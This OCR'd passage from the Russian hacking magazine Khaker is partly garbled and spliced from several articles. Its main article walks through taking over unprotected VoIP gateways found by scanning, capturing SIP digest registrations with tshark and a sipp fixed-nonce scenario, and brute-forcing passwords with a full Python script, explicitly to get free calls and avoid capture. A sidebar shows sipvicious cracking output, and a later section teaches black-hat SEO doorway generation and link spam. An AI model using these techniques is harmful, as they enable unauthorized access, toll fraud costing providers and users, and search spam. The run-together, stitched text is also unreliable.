книги хакеры / журнал хакер / 148_Optimized

эксперта

илижеиспользуютсястарые, с неожиданногодляразработчиковзащитыракурса. Впринципе, внедреноужемногоразличных механизмовдляпротиводействияинауровнесамихоперационныхсистем(DEP, ASLR, SEHOP). Именноблагодаряэтим механизмампорогмастерства длячеловека, разрабатывающегосегодняэксплойтыилизанимающегосяпоискомуязвимостей, сильновозрос.

Александр Матросов, директор Центра вирусных исследований и аналитики компании ESET

Атеперьоцени, каквсеусложнилосьсейчас. 2011ÃÎÄ Необязательноглубокоразбиратьсявэтой

теме, чтобыпооднойкартинкепонять, что

плохимпарнямприходитсяискатьвсеновые иновыевекторыатакиобходитьпоявившиесязащитныемеханизмы.

ВЗЛОМ

Алексей «Aggressor» Соколов

С чего все начиналось

На тему астерисков и подбора паролей к ним написано очень много статей. Люди в теме наверняка слышали про набор утилит sipvicious, а многие их даже уже попробовали.

Однако, когда ты сканируешь сеть при помощи svmap.py (скрипт входит в вышеупомянутый комплект), то в Сети помимо астерисков находятся различные VoIP-железки, как то: Cisco, AddPac, Linksys и так далее. Как правило, у них есть собственный webинтерфейс. И если ты думаешь, что он запаролен, то ты, наверное, прав. Но не всегда :). У Linksys по умолчанию нет пароля на web-интерфейсе. А зря, ведь многие их железки могут быть доступны извне.

Осваиваемся

Переходим к практике. Просканировав пару подсетей, я нашел VoIPтелефон SPA-841. Судя по IP-адресу, он находится в Перу, а конкретнее — в городе Лима. Я зашел на этот телефон, и оказалось, что внутри не выставлен ни пользовательский пароль, ни админский, а значит, с VoIP-телефоном можно делать что угодно. На телефонах

Cisco-500 во вкладке «VoiceÆPhone» существует поле «Text Logo». И

его довольно легко поменять. Например, на ряде штатовских шлюзов я проставил фразу «from Russia with Love» и она отображалась на дисплее VoIP-телефона :). Как правило, после этого у железки сразу же менялся IP (либо на web все-таки ставили пароль), и у меня пропадал к ней доступ. Но было и такое, что заставка провисела на

Запрос на регистрацию в консоли астериска

телефоне две недели, хотя вызовы совершались каждый рабочий день. В среде администрирования можно сменить параметры интернет-соединения, тогда шлюз совсем перестанет работать. Можно его запаролить, переименовать любые контакты... В общем, на что хватит фантазии. Но это все ребячество. Как же из такой находки получить реальную пользу? Через web, например, я вижу, где регистрируется шлюз, какой у него username и auth id (если есть), но не знаю пароль. Первым делом проверяю, не используется ли пароль, равный логину. Это можно сделать, вбив данные в сип-клиент. Обычно отображается ошибка 403 (пароль не подходит), однако даже в этом случае еще не все потеряно.

SIP-регистрация

Рассмотрим, как происходит процесс SIP-регистрации. Изначально клиент отправляет на Softswitch (например, Asterisk) запрос «REGISTER», в котором нет пароля, а есть только contact. В ответ приходит сообщение «401 Unauthorized», в котором указано, что нужно пройти

«Digest access authentication». В присланном сообще-

нии сгенерированы nonce и realm. Используя nonce и realm (полученные от сервера), пароль и username (прописанные на шлюзе), а также digesturi, шлюз генерит md5-хэш — response — и отправляет все это обратно на Softswitch, который проверяет присланные данные. Если они верные, то возвращает 200 ОК, если нет — снова 401. Получается, если достать дамп регистрации, то у тебя окажутся все данные, кроме пароля, а его можно будет подобрать. Для этого устанавливаем астериск, заводим в нем единственный peer, вбиваем

username, как на шлюзе, и прописываем любой пароль. Затем применяем настройки.

Простейшийпириз/etc/sip.conf

[peru]

type=friend username=*username со шлюза* secret=helloworld

host=dynamic

disallow=all

allow=alaw

allow=ulaw

Далее я запускаю на астериске команду tshark с фильтром по порту 5060 и записью дампа в файл: tshark port 5060 -w /tmp/001.pcap. Затем, зайдя на шлюз,

меняю значение Proxy на IP-адрес астериска и жму

В нем мне нужно перебирать весь алфавит. Для этого

яиспользовал готовый класс, взятый на goo.gl/Ravuu,

— он решает проблему с генерацией всех возможных вариантов пароля и позволяет задать алфавит для перебора (то есть искать только среди цифр, строчных букв и любых их сочетаний). А также задать длину пароля, начальное и конечное его значения.

#!/usr/bin/python

import md5 # подключаем библиотеку, которая будет генерить md5-хэш

#дальше идет класс для подбора пароля

EN = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"

#перечисление алфавитов

en = "abcdefghijklmnopqrstuvwxyz" digits = "1234567890"

space = " "

p = ",.-!?;:'\"/()" op = "+-*/:^()><="

all_spec = "'~!@#$%^&*-_=+\\|/?.>,>'\";:[]{}" class ABCIterator:

#... здесь следует класс, спертый из интернета :)

#...

#класс закончился, переходим к вводу данных u=(raw_input('username >> ')); b=(raw_input('realm >> ')); m=(raw_input('method >> '));

ВЗЛОМ

SIP-авторизация

d = (raw_input('digestURI >> ')); r = (raw_input('response >> ')); n = (raw_input('nonce >> '));

print u,b,m,d,r,n;

ha2= md5.new(m+":"+d).hexdigest();

#генерим часть ha2 — она будет использоваться для хэширования response=0;

ch=0; # в эту переменную будет сохраняться

#порядковый номер пароля

for i in ABCIterator(start_len=1, stop_len=8, abc=digits+en):

#указываем, что длина пароля начинается с 1,

#заканчивается на 8, # и при переборе используются

#цифры и буквы нижнего регистра

ch = ch+1;

if ch % 500000 == 0: print i;

#это позволяет выводить на экран только каждый 500000-ый

#вариант пароля

ha1 = md5.new(u+":"+b+":"+i).hexdigest();

response = md5.new(ha1+":"+n+":"+ha2).hexdigest(); # хэшируем if r == response: # сравниваем хэш с полученным от шлюза

print "------------------>", i;

# если они совпадают, выводит пароль и прекращаем поиск exit(0);

Пароль найден

Итак, скрипт отработал и подобрал пароль, а значит — можно прописывать данные в астериск и думать, что регистрация прошла успешно. Новый халявный транк для звонков на Кубу готов :). Вообще технологию можно доработать, ведь каждый раз перебирать пароль нецелесообразно. Имея доступ на шлюз, можно менять не только значение Proxy, но и username. Если найденные шлюзы регистрировать всегда на одном и том же сервере, то realm всегда будет asterisk, а digesturi — не меняется. Это значит, что достаточно научиться всегда отправлять в ответ на REGISTER сообщение 401 с постоянным nonce. Тогда можно составлять свою таблицу с хэшами паролей, так как все параметры от шлюза к шлюзу будут одинаковые (кроме пароля). Нужно перебирать все возможные пароли с постоянными realm, digesturi, username, метод — REGISTER, nonce и сохранять в базу соответствие «пароль-response», причем для каждого нового шлюза только делать выборку по response и сразу находить пароль. Затем генерить в ответ на регистрацию пакет 401 с одним и тем же nonce (это может программа sipp). Если составить такую базу данных, то можно открывать сервис по восстановлению забытых на шлюзах паролей для регистрации, вот только база получится слишком объемной :). Чтобы отвечать на REGISTER шлюза в sipp, надо использовать сценарий:

Cценарийдляsipp — nonce.xml

<?xml version="1.0" encoding="ISO-8859-1" ?>

<scenario name="register">

Статистика работы программы sipp

<recv request="REGISTER"/> <send>

<![CDATA[

SIP/2.0 401 Unauthorized

Via: SIP/2.0/UDP [local_ip]:5060; branch=[branch];received=[remote_ip] From: *username со шлюза*

<sip:*username со шлюза*@*ip c Asterisk*> To: *username со шлюза*

<sip:*username со шлюза*@*ip c Asterisk*> Call-ID: [call_id]

CSeq: [cseq] REGISTER Server: Asterisk PBX 1.6.2.13 Allow: INVITE, ACK, CANCEL,

OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO

Supported: replaces, timer WWW-Authenticate: Digest algorithm=MD5, realm="asterisk", nonce="17852b0a" Content-Length: [len]

]]>

</send>

</scenario>

Благодаря опции <recv request=»REGISTER»/> sipp отправит наш «магический» пакет только когда придет запрос на регистрацию. Останавливаем астериск, чтобы он не отвечал на запросы со шлюза, затем создаем сценарий и из этой же папки запускаем sipp:

sipp -sf nonce.xml *ip шлюза* -i *ip c Asterisk* -trace_msg \

-l 10 -r 1 -rp 1000

Запускаем tshark с записью в файл и пробуем зарегистрировать шлюз. Открываем дамп и снова видим все данные, которые требуются для перебора.

Добытые данные можно использовать для подложной регистрации на сервере, даже не подбирая пароль, но это уже тема для другой статьи. Вот такой незамысловатый способ обеспечить себя бесплатными звонками, если повезет — то в любую точку мира, а если сильно повезет (или если использовать меры предосторожности), то еще и никогда не поймают :). z

11 МИЛЛИОН ЕВРО УЩЕРБА ОТ ДЕЯТЕЛЬНОСТИ VOIP ХАКЕРОВ

ТемавзломаVoIP-шлюзовзвучитнетакужичасто. Дажееслипосмотретьпоследниехакерскиеконференции, томоданаэтутемунемного поутихла. ВместестемвСетиестьнемалолюдей, которыехорошо разбираютсявтемеиумеютэтинавыкимонетизировать. Показательнымпримеромсталанедавняяисторияпродвухрумынскиххакеров КаталинаЗлейтаиКристианаСиювата, которыесумелизаработатьна VoIP болеемиллионаевро. Используемыеподходыбылинеслишкомзамысловатыми. ПарнисканировалидиапазоныIP-адресовс extension'ами, которыеимелислабыепароли. Наверное, никтобы этогоинезаметил, еслибыонипростоиспользовалиполученные аккаунтыдлябесплатныхзвонков. Ноущерботихдеятельностисоставилпримерно11 миллионовевро. Как?!

Какгласятдокументыследствия, изначальнопарниограничивались бесплатнымизвонкамивразличныхнаправлениях. Ноаппетиты, как известно, растут, иребятабыстросмекнули, какможноэтомонетизировать. Задвагодаонисделалиболее23 500 звонков(это315 000 минут) наплатныеномера, предлагающиезаденежкусамыеразные сервисы(преждевсегосправочноготипа). Прибыльполучаласьот участиявпартнерскихпрограммахспровайдерамиэтихсамыхплатныхномеров. Былаполученаперваяприбыль. Осознав, чтовдвоем заработатьмногонеполучится, быласозданаспециальнаякомпания

Shadow Communication Company Ltd. Сэтогомоментабизнесвышел насовершенноновыйуровень. Нанимаялюдейиреализовавдля

сотрудниковудобныйинтерфейс(внем, кпримеру, отображались ценыдлязвонковнаплатныеномераиспециальныеусловиявроде ограниченияпоколичествувыполненныхзвонковвдень), онисумели достичьсовершенноновыхвершин. Болеетого, былаорганизована компания, котораясамапредоставлялавозможностьрегистрации платныхномеров, адляболееэффективнойработы— системарефералов, стимулирующаяактивность.

Теперь ужестановитсяясно, откудавзяласьтакаябаснословная суммаущербадлячестныхпользователейVoIP. СиламиShadow Communication Company былосовершено1 541 187 несанкциониро-

ванныхзвонков— это11 094 167 минутразговора. Неудивляйсятаким цифрам: этоподсчетизлогов, предоставленныхVoIP-провайдерами. Сейчасподелупроходят42 человекавразныхгородахЕвропы.

Админка VoIP-сервиса для звонков на платные номера

КАК БРУТЯТ SIP-АККАУНТЫ?

МногиеатакинаVoIP сводятсякпоискунеправильнонастроенных

PBX (private branch exchange) или, по-русскиговоря, офисныхАТС.

Различногородасканирования, анализиподборпаролейчаще всегоосуществляютсяспомощьюупомянутоговтекстестатьинабора скриптовSIPVicious (sipvicious.org), написанныхнаPython'еиработающихподразнымиОС. Чтобылучшепониматьматериал, вспомним, какосуществляютсяосновныедействиянапростомпримере.

1. Сканированиедиапазонаподсети(пустьэтобудет192.168.1.1/24), чтобынайтиBPX.

[you@box sipvicious]$ ./svmap 192.168.1.1/24 | SIP Device | User Agent |

---------------------------------------------

| 192.168.1.103:5060 | Asterisk PBX |

Есливеритьрезультатам, тоАТСнайденанаIP-адресе192.168.1.103, а работаетонанабазеAsterisk PBX.

2. Поискextention'ов(грубоговоря, виртуальныхномеров) нанайденнойАТС. Этиаккаунтыможнобудетиспользоватьдляосуществления звонков.

[you@box sipvicious]$ ./svwar.py 192.168.1.103 | Extension | Authentication |

------------------------------

| 123 | reqauth |

Итак, найденотриномера. Мывидим, чтономер101 нетребуетавторизации. Адля100 и123 необходимаавторизация.

3. Подборпароля, подставляячисловыезначения(онииспользуются болеечемчасто):

[you@box sipvicious]$ ./svcrack.py 192.168.1.103 -u 100 | Extension | Password |

------------------------

| 100 | 100 |

Дляextention’а«100» парольподобран!

4.Подборпаролясиспользованиемсловаря:

[you@box sipvicious]$ ./svcrack.py 192.168.1.103 -u 123 \ -d dictionary.txt

| Extension | Password |

------------------------

| 123 | secret |

Естьпарольидляномера123!

ВоттакпростомынашлиАТС, рабочиеаккаунтыиподобралидляних пароль. Злоумышленникможетподставитьнайденныелогин-пароль всвойSIP-клиент(например, X-Lite) иосуществитьзвонки.

ДОРВЕИДЛЯСАМЫХ МАЛЕНЬКИХ

Как это работает?

Допустим, какой-нибудь богатый и продвинутый человек захотел купить себе слона :). Первым делом он заходит в свой любимый поисковик и вводит ключевую фразу «Купить слона». Поисковая машина сразу же выдает ему десятки результатов. Конечно же, самые релевантные и самые значимые для нашего потенциального покупателя результаты находятся в первой десятке-двадцатке выдачи. Таким образом, перед тобой встает задача сделать так, чтобы твой сайт оказался в числе тех самых

заветных ссылок про покупку слонов, по которым юзер может проследовать и все-таки совершить свою покупку.

Какой в этом толк конкретно для тебя? Смотри: покупатель переходит на твой сайт, принимающий участие в партнерской программе по продаже слонов, и если покупка совершается, то тебе начисляется определенный процент. Здесь действует крайне банальное правило: чем больше покупателей слонов перейдут на твою страничку и чем больше купят слонов, тем больше профита ты получишь. Так что мы ставим логичную

задачу: выбиться в топ нужного поисковика по определенному кейворду.

Так как простое создание интернет-магазина или сайта-участника ПП (партнерской программы) и последующая его раскрутка являются крайне долгими, сложными, и трудозатратными занятиями, очень давно некие хитрые люди придумали серые и черные методы SEO — не совсем честные способы продвижения в топы поисковиков.

В данных подразделах поисковой оптимизации существуют десятки различных схем работы, различающихся по степени приватности и сложности. Наша задача на сегодня — научиться работать на простейшем уровне с наиболее доступной и легкой для освоения специализированной программой — доргеном red.Button.

Как это выглядит?

Оставим на время наш дорген и рассмотрим общую и самую простую схему работы в серо-черном SEO. Итак, первым делом запомни один важный совет: если ты хочешь работать в данном направлении поисковой оптимизации, никогда не отвлекайся по мелочам, отдавай всего себя этому делу, а также веди скрупулезный лог всего, что ты делал или собираешься делать с дорами — твоими специально оптимизированными страничками, созданными на Ред.Баттоне.

Вот небольшая схема, которая поможет тебе на первых порах:

1.Выбери направление своей работы. Это могут быть PPS (Pay Per Sale), партнерки (адалт, дэйтинг, фарма, казино, софт, шмотки и так далее), PPC (Pay Per Click) — любые направления, PPL (Pay Per Lead)

и другие.

Лучше всего выбирать несколько типов и несколько ниш — шансы на успех многократно увеличатся. Но также важно не распылять свои усилия, так что ограничься двумя-тремя вариантами.

Приводить ссылки на конкретные партнерские программы здесь я не буду, поскольку их существует великое множество. Выбрать тебе помогут старина Гугл и SEO-форумы.

2.Продвинутые сеошники всегда смотрят выдачу поисковиков по интересующему их направлению, а затем на базе этих наблюдений разрабатывают стратегии продвижения своих ресурсов. Обычно по дорам конкурентов можно понять множество интересных вещей, которые дадут тебе возможность вылезти в серп (выдачу) поисковика.

3.Собираем ключевые слова. Для этого юзаем Гугл или популярные в наше время специализированные программы «Анадырь» и «Магадан». Также следует заметить, что подавляющее большинство партнер-

Дорвей, сделанный на red.Button

ских программ уже давно предоставляют своим вебмастерам специально заточенные под ПП списки ключевых слов.

4.После сбора кейвордов тебе, конечно же, не стоит сразу делать доры по всем ним. Грамотным действием будет очистка списка кейвордов от мусора, так как нецелевые кейворды — это всегда лишний трафик и камень, тянущий весь дор вниз по выдаче. В большинстве случаев оптимизаторы чистят кейворды вручную, но для этого есть и специальные утилиты — например, KeyWordKeeper.

5.Генерируем дорвей — подробнее об этом ты сможешь прочитать ниже.

6.Еще одна важнейшая часть процесса продвижения в черно-сером SEO — это спам. Конечно, существует целое множество программ для выполнения действий такого рода (Хрумер, Апостер, АллСабмитер и другие), но все они, как правило, платные, к тому же очень дорогие.

Для тебя, как для начинающего, подойдут следующие способы спама:

•ручной спам путем проставления комментариев в тематических блогах (например, ты все-таки сделал дорвей с ключевой фразой «Купить слона» — следовательно, ты должен поискать блоги, рассказывающие о слонах, и оставить в них осмысленные комментарии со ссылкой на свой дорвей);

•профили на трастовых форумах — просто оставляем ссылки на свой дорвей в подписи;

•добавляем ссылки на свой дорвей в поисковики с помощью их сервисов «AddUrl» (ссылки ищи в сносках).

7.Теперь нам необходимо проследить за своими дорами. Это можно делать, опять же, вручную или с помощью специализированного софта: Site-Auditor, ControlDoors и других.

8.Подсчитываем выручку и переходим к созданию новых дорвеев :).

Конечно, данная схема довольно общая, но она идеально подходит для начинающих дорвеестроителей. В дальнейшем ты сам сможешь понять на интуитивном уровне, что и как нужно делать.

Что такое Ред.Баттон?

Теперь настало время перейти к, собственно, Ред. Баттону.

Итак, red.Button — это дорген, который существует

с2003 года. За это время он один раз менял свое название (ранее был Forum Generator), множество раз — дизайн, а также оброс десятками полезных фич. Здесь стоит заметить, что дорген не обновлялся

с2008 года, поэтому в Сети расплодилось бесчис-

dvd

Надискеищиследующиеполезные утилиты:

•Генераторшаблонов: скрипт, спомощьюкоторогоможно генерироватьшаблоныкРед.Баттону;

•Анадырь2.3: собираемкейворды;

•Magadan Lite: со-

бираемкейворды, часть2;

•KeyWordKeeper 4.2.4:

чистимкейворды;

•ControlDoors: кон-

трользадорами;

•Site Auditor:

контрользадорами, часть2;

•Red.Button

TRANSFORMER:

дорген.